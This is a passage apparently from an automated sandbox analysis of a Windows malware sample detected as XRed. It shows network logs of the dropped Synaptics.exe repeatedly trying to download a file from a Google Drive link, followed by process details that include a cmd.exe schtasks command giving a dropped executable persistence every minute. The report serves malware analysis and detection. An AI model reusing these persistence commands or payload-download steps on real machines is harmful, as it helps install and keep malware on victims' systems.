Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.10	50049	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:48 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:49 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC4n53NrNrBA21Sa1GHwIvIirBSokl9YJr-ED-XmqtUgFgSu6b6bOI3kk9MXsgpJSO0SlgO6FQU Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:49 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'report-sample' 'nonce-KolNUj-VPaWOr05Yjfibig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:49 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:49 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 76 43 34 37 37 68 68 39 67 6a 37 68 59 36 59 77 41 6e 78 79 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="GvC477hh9gj7hY6YwAnxyQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:49 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.10	50050	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:48 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:49 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC4w-EUbVS3hrBH9LWrhSX6TxUqMCafXZDoP-jKXqVBBxb0UUevl_4MbPFzSVOw-Dbg5tY70dbg Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:49 GMT Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-jJxCKgU0jX_J0nqL6hL6qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:49 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:49 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 34 2d 2d 6a 7a 48 69 74 42 5a 63 72 67 55 6a 59 34 42 76 69 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="I4--jzHitBZcrgUjY4BviQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:49 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.10	50056	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:49 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:50 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:49 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-LcH_Cr_d-f8X6kKVRLMD6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.10	50057	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:49 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:50 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:49 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-wR9_erUh7tPTtmddtJWCVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.10	50058	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:56 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:56 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC72XH8rNJI42Z2qTE531bps1biXVwQYs_jjhHCiBCWw18z6_ROnxg0k5qUl5zUyzv5fQy8tXFk Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:56 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-zp2mLjBNt7KbIzCZkaySEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:56 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:56 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 4f 74 47 50 31 47 53 5a 32 36 74 69 49 52 37 70 46 6a 6f 6d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="fOtGP1GSZ26tiIR7pFjomA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:56 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.10	50063	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:56 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:56 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC4yK_mOZ6Bk2F2bEEUJBMeWAj6si9Jgc3S4uiZugiTM91O3ASjP_NhtceWOLXMKcTHqdSdI0Fc Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:56 GMT Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-GYN2fPBI_YFU4zRTcutHaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:56 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:56 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 31 58 72 67 36 4f 64 6b 62 78 7a 57 38 4a 48 58 49 51 71 39 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="E1Xrg6OdkbxzW8JHXIQq9g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:56 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Target ID:	0
Start time:	05:25:14
Start date:	30/12/2024
Path:	C:\Users\user\Desktop\KOGJZW.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\KOGJZW.exe"
Imagebase:	0x400000
File size:	1'730'560 bytes
MD5 hash:	B53BEBA4041F41281A5AA172F93FBDD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1325538739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1325538739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:25:15
Start date:	30/12/2024
Path:	C:\Users\user\Desktop\._cache_KOGJZW.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\._cache_KOGJZW.exe"
Imagebase:	0x410000
File size:	958'976 bytes
MD5 hash:	BDFE0E6CBA45083DA1F97E4BA1B8D14F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 50%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	05:25:15
Start date:	30/12/2024
Path:	C:\ProgramData\Synaptics\Synaptics.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Imagebase:	0x400000
File size:	771'584 bytes
MD5 hash:	7103F3EEC43BBABE34068295157F9F1C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.1413662003.0000000000535000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:25:16
Start date:	30/12/2024
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Imagebase:	0x570000
File size:	53'161'064 bytes
MD5 hash:	4A871771235598812032C822E6F68F19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	05:25:18
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c schtasks /create /tn WSFDII.exe /tr C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe /sc minute /mo 1
Imagebase:	0xd70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:25:18
Start date:	30/12/2024
